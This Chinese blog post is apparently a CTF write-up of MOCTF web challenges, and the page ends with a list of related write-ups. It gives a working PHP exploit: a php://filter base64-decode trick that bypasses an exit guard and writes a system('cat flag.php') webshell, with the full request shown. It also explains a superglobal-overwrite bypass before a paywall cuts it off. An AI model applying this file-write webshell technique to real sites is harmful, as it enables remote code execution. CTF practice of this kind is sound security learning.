简单记录一下MOCTF的三道web题

最新推荐文章于 2022-12-30 22:35:01 发布
最新推荐文章于 2022-12-30 22:35:01 发布
阅读量3.6k 收藏 3
点赞数 1
分类专栏: CTF Web 文章标签: MOCTF web writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011377996/article/details/79465199
版权
本文详细记录了解决MOCTF中三道web题目的过程,包括死亡退出的代码审计、unset的超全局变量覆盖问题,以及PUBG的源码泄露与反序列化漏洞利用。通过分析代码、构造payload并利用PHP特性,成功获取flag。
摘要由CSDN通过智能技术生成

本人渣渣,于是记录一下

死亡退出

一道代码审计题目

<?php
  show_source(__FILE__);
  $c="<?php exit;?>";
  @$c.=$_POST['c'];
  @$filename=$_POST['file']; 
  if(!isset($filename))                    
  {                                       
    file_put_contents('tmp.php', ''); 
  }                                 
  @file_put_contents($filename, $c);
  include('tmp.php');
?>

来看看代码,@是用来忽略错误
这段代码是利用最后的include执行temp.php,那么我们很快九形道运用伪协议把它给读出来。。但前提是要绕过"<?php exit;?>";不然会直接退出

这里搜到一篇文章用base64绕过的一篇文章
https://www.leavesongs.com/PENETRATION/php-filter-magic.html

这一题我本来是想用print_r('flag.php')构造的,发现不行,查了查手册发现是自己理解函数有问题
于是参考了方方土学长的构造,我使用<?php system('cat flag.php');?>
base64编码之后PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygiZmxhZy5waHAiKTs/Pg==

然后 

c=aPD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygiZmxhZy5waHAiKTs/Pg==&file=php://filter/write=convert.base64-decode/resource=tmp.php

post参数c的时候会在<?php exit;?>后面加一些东西
所以会变成这个样子

<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

然后经过base64decode之后就变成了下面的那个样子

^?Z<?php system('cat flag.php');?>

注意我的base64为什么前面多了个a,那是因为
在解码的过程中,字符<、?、;、>、空格等一共有7个字符不符合base64编码的字符范围将被忽略,所以最终被解码的字符仅有“phpexit”和我们传入的其他字符。
而phpexit一共7个字符,因为base64算法解码时是4个byte一组,所以给他增加1个“a”一共8个字符。这样,”phpexita”被正常解码,而后面我们传入的webshell的base64内容也被正常解码。

不知道为什么,最近用bp发包都搞不了这题,我是用火狐自带Hackbar发送post数据才在控制台下面看到的flag
我也很是奇怪。。。。用bp抓一下包用其comparer功能对比之后发现改的包没啥差异。。。。以后还是抓包还是先过一遍hackbar吧。。emmmm

最后经过Hackbar截的包

POST / HTTP/1.1
Host: 119.23.73.3:5003
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
cache: no-cache
origin: moz-extension://d734739a-e2f8-430e-8dc3-796d3187dbc2
Content-Length: 126
Connection: keep-alive

c=aPD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygiZmxhZy5waHAiKTs/Pg==&file=php://filter/write=convert.base64-decode/resource=tmp.php

unset

这道题目也是多亏了方方土学长指导我仔细看清楚这个漏洞,最后终于明白了

这个主要是利用了Destoon 20140530最新版超全局变量覆盖导致的安全问题
这是网址:http://www.secevery.com:4321/bugs/wooyun-2014-063895

如果 post get cookie 请求中的$$key$value相等 就unset掉$$key
如果我们向1.php?x=1提交一个POST请求 内容为_GET[x]=1
因为?x=1 所以$_GET内容为 array('x'=>'1'),但是这里没什么关系,如果没传post参数上去的话,遍历到第一个key的时候就会符合正则继而执行exit。。。。。这个自己尝试

如果传参post上去的话,当开始遍历$_POST的时候 $__k_GET[x] 所以$$__k 就是$_GET[x]也就是array('x'=>'1')
$__v是POST上来的一个数组 内容也是array('x'=>'1')
$

最低0.47元/天 解锁文章
0verWatch
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MOCTF_misc
LittleKeKe的博客
04-03 475
我是小萌新在成长,希望遇到更多大佬 平台: http://www.moctf.com/challenges 由于我自己是个萌新,所以一方面写下来记住,一方面写给更加萌新的萌新,哈哈哈 这里少两:百变flag、奇怪的01 参考一个博主的: https://blog.csdn.net/weixin_34050389/article/details/88208331 我可是黑客 图片另存为本地,用W...
MOCTF Web writeup (持续更新)
qq_41358038的博客
03-15 583
MOCTF-Web writeup (持续更新) 1.一道水 查看源代码,flag在最下面 2.还是水 按F12,选中这个文本框 将划横线部分删去,将4改为5,输入moctf,提交一下即得flag 3.访问限制 打开后显示 只允许使用NAIVE浏览器访问! 用BP抓包,send to repeater 将Firefox改为NAIVE,GO一下即可 4.机器蛇 打开之后是一个很无聊的小游戏,...
MOCTF writeup web篇(持续更新)
ReganYue's Blog
05-09 1626
web1:一道水 查看源码。get flag。 web2:还是水 审查元素,删除disable,将长度改为5,输入moctf。get flag 。 web3:访问限制 burpsuite改user-agent:NAIVE Accept-Language: zh-HK。get flag。 web4:机器蛇 贪吃蛇好不好玩? 目机器蛇让我想到robots.txt robots.txt里面有fl...
Moctf Web
ChanCherry的博客
09-25 184
php黑魔法 emmm传送门只有下图, 查看源代码,也没有发现什么,于是,查看一下http://119.23.73.3:5001/web5/index.php,还是什么都没有,大佬提示访问http://119.23.73.3:5001/web5/index.php~,然后查看源代码, 大致意思是参数a,b的md5值相等,但a不等于b,就可以输出flag。 两种方法: 1.构造数组,md5加密遇到...
MOCTF——Web
team39的博客
04-20 248
第一:一道水 直接审查元素 第二:还是水 观察页面,目要求在对话框输入moctf,但是发现输入框不能输入,审查元素,发现—— disabled元素—— 禁用 input 。被禁用的 input 元素既不可用,也不可点击。可以设置 disabled 属性,直到满足某些其他的条件为止(比如选择了一个复...
MOCTF-Web-暴跳老板*
1stPeak's Blog
09-24 156
1、目: 2、传送门:http://119.23.73.3:5006/web1/ 根据上面几幅图所示,应该是需要修改POST,我们进行bp抓包查看 3、抓包 4、根据上图提示,我们发现,需要使用Dear进行POST请求 ...
小结一下Web的条件竞争的
0verWatch的博客
03-10 5632
前言 最近在做我们学校平台的一个目的时候,突然发现了一个新知识。。。。。可能我是菜鸡吧,大佬们请忽视 正文 这个知识点叫条件竞争。。。 条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问的发生。 简单点理解就是在你要做一件事情的时候用很快的速度插了个队并做了另外一件事,一旦这件事...
MOCTF crypto 密码学 writeup
qq_41358038的博客
03-14 790
MOCTF crypto 密码学(持续更新)1.数据库密码2.rot 大法好3.奇怪汉字4.就是这个feel 1.数据库密码 D8EA7326E6EC5916ACCD6E0C9D264C63 涉及到数据库,猜到是md5,但没想到是要把0-9,A-F 之外的字母删掉再md5解密。 还是对md5了解不够 MD5编码: 要么全为大写,要么全为小写 字符数量16/32 MD5的取值范围是0~9 a~f ...
MOCTF misc
ChanCherry的博客
08-16 247
0x00 假装安全 目给了一个carefully.jpg,用记事本打开发现有flag.txt,于是binwalk一下, 果然,里面有个zip,其中有个flag.txt,binwalk -e carefully.jpg解压一下,得到一个压缩包和flag.txt,打开flag.txt就可以看到一串像是flag的东西: mcfCrflyS1eot{@eul_ld} 栅栏密码解密,即可得到moctf{...
MOCTF-Web-我想要钱
1stPeak's Blog
09-23 226
1、目: 2、传送门:http://119.23.73.3:5001/web6/ 3、代码释义: <?php include "flag.php"; highlight_file(__FILE__); if (isset($_GET['money'])) { $money=$_GET['money']; if(strlen($...
MOCTF-Web-登录就对了
1stPeak's Blog
09-24 298
1、目: 2、点击传送门: 3、渗透 我们随便输入一个账号密码看看 发现账号密码错误,那么我们再来看看源代码,也没看到啥,那我们最后抓包看一下: 也没有发现什么东西,那我们看看是否可以用万能密码绕过: F12查看源码,发现flag ...
moctf-web(前15
没有任何buff的小菜鸡的博客
07-17 366
moctf-web 好久没有开始打了,开始生疏了,过完一个期末考试周,现在我又回来了! 真的是从头开始学习qwq,那我现在的博客一定要好好的写,认认真真的写! 第一–一道水 进入网站后 点击F12 即可得出答案 (这是通常的最简单的水–一般的平台的第一道都是这样纯粹给大家兴趣) 第二–还是一道水 进入后,画面是这个样子的 但是试图输入moctf进去,无法行得通,于是F12开启,看源...
MOCTF新春欢乐赛-逆向writeup
杀生丸?不,其实我要的是桔梗
02-15 981
1.easyre(50) &lt;给入门小伙子看的哈&gt; 这是一个linux的运行文件。 IDA打开: 知道关键代码在getflag函数。 双击进入getflag IDA会把字符串转为16进制。 现在你需要将这些转回来。对着16进制按R 现在代码的思路就很清楚了。 创建一个字符串=“}moctf” strcat拼接acc,add,‘-’,abb 最后加上‘}’...
暴跳老板-moctf
Xi4or0uji
03-18 941
调试看见submit键链接到post.html,跳转后看见表单提交到do.php,直接改url到do.php看到弹窗please POST your email by Dear!这里xiaorouji一开始直接简单粗暴地在textarea输入Dear,结果不行....(当然不行啦→_→你正常点,我害怕)想回这句话please POST your email by Dear!应该是要POST什么值过...
Writeup of MOCTF
MozhuCY的博客
02-01 1603
RE: 0x00:SOEASY逆向的签到,扔进IDA搜索字符串,本来想定位下主函数,结果直接看到了flag。  0x01:跳跳跳打开dump.exe发现居然是掷色子的游戏..很明显爆破,OD载入找到关键跳,直接吧jnz改成je...或者从开头直接跳到最后hhhhhhhhh,得到一串base64,解之得到flag。  0x02:听小姐姐的话此官方并没放出..  0x03:暗恋的苦恼得到一个jia...
MOCTF-WRITE-UP(二)
郁离歌丶的博客
03-14 1381
MOCTF-WRITE-UP(二)WEBFlag在哪?question:flag到底在哪!Hint1: 跟一首歌有关。Hint2: PPAPanswer:其实一道脑洞,burp抓包即可看到302跳转12345where is flag!I have a flagI have a frog!ah~ guess where is flag!There is no flag!23333典型的PPAP,...
CTFshow命令执行29-123
qq_43534481的博客
08-06 1486
CTFshow命令执行WP
命令执行web入门
最新发布
2201_75316477的博客
12-30 1507
我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。如果对取反不了解可以百度一下,这里给个容易记得式子,如果对a按位取反,则得到的结果为-(a+1),也就是对0取反得到-1。其中%09,%26不受数字被过滤的影响,因为在加载时%09,%26会被解码为空格和分号,也就没有了数字。过滤了冒号,不能用伪协议了,没有过滤英文状态的**()** 和**;这下好了,过滤了字母,但是数字没有过滤,数字?
base解码_php://filter在一次CTF中base被过滤的利用
weixin_39565910的博客
11-27 900
0x00 简介在一次线下ctf中的web有一道关于php://filter伪协议的利用0x01目分析靶机环境http://192.168.1.151:88/flag.php 存放flag信息的http://192.168.1.151:88/index.php 注释中有include1.phpinclude1代码如下error_reporting(0); @$file = $_G...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值